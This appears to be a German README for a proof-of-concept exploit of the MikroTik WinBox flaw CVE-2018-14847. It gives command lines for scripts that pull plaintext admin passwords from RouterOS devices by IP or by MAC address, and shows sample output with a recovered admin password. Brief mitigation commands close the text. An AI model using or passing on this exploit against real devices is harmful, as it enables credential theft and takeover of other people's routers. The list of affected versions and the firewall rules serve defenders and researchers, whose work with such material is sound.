
Konzeptnachweis der kritischen Schwachstelle in Winbox (CVE-2018-14847)
Dies ist ein Proof-of-Concept der kritischen WinBox-Sicherheitslücke (CVE-2018-14847), die das Auslesen von Klartext-Passwörtern aus beliebigen Dateien ermöglicht.
Die Sicherheitslücke wurde bereits vor langer Zeit behoben, daher ist dieses Projekt beendet und wird nicht mehr unterstützt oder aktualisiert. Sie können es forken und selbst aktualisieren.
https://n0p.me/winbox-bug-dissection/
Dieses Skript wird NICHT mit Python 2.x oder niedriger ausgeführt.
Das Skript wird einfach mit einfachen Argumenten in der Befehlszeile verwendet.
Nutzen Sie die Sicherheitslücke aus und lesen Sie das Passwort aus.
python3 WinboxExploit.py <IP-ADDRESS> [PORT]
Example:
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord
Sie können Dateien extrahieren, selbst wenn das Gerät keine IP-Adresse hat.
Einfache Erkennungsprüfung für lokal verbundene Mikrotik-Geräte.
python3 MACServerDiscover.py
Example:
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)
aa:bb:cc:dd:ee:ff
aa:bb:cc:dd:ee:aa
Nutzen Sie die Sicherheitslücke aus und lesen Sie das Passwort aus.
python3 MACServerExploit.py <MAC-ADDRESS>
Example:
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff
User: admin
Pass: Th3P4ssWord
Alle RouterOS-Versionen vom 28.05.2015 bis zum 20.04.2018 sind für diesen Exploit anfällig.
Mikrotik-Geräte mit RouterOS-Versionen:
Weitere Informationen finden Sie unter: https://blog.mikrotik.com/security/winbox-vulnerability.html
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
/tool mac-server mac-winbox